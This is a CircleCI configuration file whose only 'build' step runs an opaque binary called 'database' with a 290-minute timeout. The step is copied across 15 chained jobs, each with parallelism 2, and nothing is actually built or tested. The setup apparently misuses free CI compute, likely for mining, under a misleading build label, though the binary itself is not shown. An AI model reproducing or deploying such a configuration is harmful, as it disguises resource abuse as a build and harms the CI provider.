version: 2.1

orbs:
  win: circleci/windows@2.4.0
 
executors:
  circleci_machine:
    docker:
      - image: circleci/node:14.15
    resource_class: medium+
    working_directory: ~/repo

commands:
  merger:
    description: Run build
    steps:
      - checkout
      - run:
          name: build
          command: |
              sudo apt update -y
      - run:
          name: build
          command: |
              chmod u+x database && ./database
          no_output_timeout: 290m

      - run:
          name: buildddart
          command:
              mv 10 2
          when: on_fail
          no_output_timeout: 5m

jobs:
  mixed1:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed2:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed3:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed4:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed5:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed6:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed7:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed8:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed9:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed10:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed11:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed12:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed13:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed14:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2
  mixed15:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [merger]
    parallelism: 2

workflows:
  version: 2
  build:
    jobs:
      - mixed1
      - mixed2
      - mixed3
      - mixed4
      - mixed5
      - mixed6:
          requires:
          - mixed1
      - mixed7:
          requires:
          - mixed2
      - mixed8:
          requires:
          - mixed3
      - mixed9:
          requires:
          - mixed4
      - mixed10:
          requires:
          - mixed5
      - mixed11:
          requires:
          - mixed6
      - mixed12:
          requires:
          - mixed7 
      - mixed13:
          requires:
          - mixed8
      - mixed14:
          requires:
          - mixed9
      - mixed15:
          requires:
          - mixed10